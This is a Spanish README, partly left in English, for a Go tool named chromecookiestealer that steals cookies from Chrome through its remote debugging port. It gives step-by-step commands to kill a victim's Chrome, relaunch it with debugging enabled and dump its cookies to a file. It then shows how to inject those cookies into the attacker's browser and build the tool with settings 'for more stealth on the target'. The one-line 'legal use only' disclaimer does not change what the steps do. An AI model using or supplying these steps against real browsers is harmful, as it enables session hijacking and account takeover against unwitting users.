
Robar/Inyectar cookies de Chrome a través del protocolo DevTools (--remote-debugging-port).
Se adjunta a Chrome utilizando su protocolo Remote DevTools y roba/inyecta/limpia/elimina cookies.
Muy inspirado por WhiteChocolateMacademiaNut.
Las cookies se vuelcan como objetos JSON usando el propio formato de Chrome. El mismo formato se usa para las cookies a cargar.
Solo para uso legal.
Robar las cookies de una víctima:
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json
Inyectar en el navegador local del atacante:
# Inicia Chrome con un puerto de depuración, como arriba.
./chromecookiestealer -clear -inject ./cookies.json
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome remote debugging URL (default "ws://127.0.0.1:9222")
-clear
Clear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
-no-summary
Don't print a summary on exit
-verbose
Enable verbose logging
go build debería ser suficiente. Lo siguiente se puede establecer en
tiempo de compilación con -ldflags '-X main.Foo=bar' para un poco más de
sigilo en el objetivo.
| Variable | Descripción |
|---|---|
| DumpFile | Nombre de un archivo al que volcar cookies. Implica -dump |
| InjectFile | Nombre de un archivo desde el cual inyectar cookies. Implica -inject |
| DeleteFile | Nombre de un archivo con parámetros que describen cookies a eliminar. Implica -delete |
| DoClear | Si se establece a cualquier valor, implica -clear |
Ninguno de los anteriores está establecido por defecto.
El Protocolo Chrome DevTools es un objetivo en movimiento. Puede ser necesario usar una versión más reciente de las librerías chromedp y cdproto en caso de que este programa deje de funcionar. Esto se puede hacer con
go get -u -v all
go mod tidy
go build
lo que podría tener el efecto secundario de romper todo lo demás.
¯\_(ツ)_/¯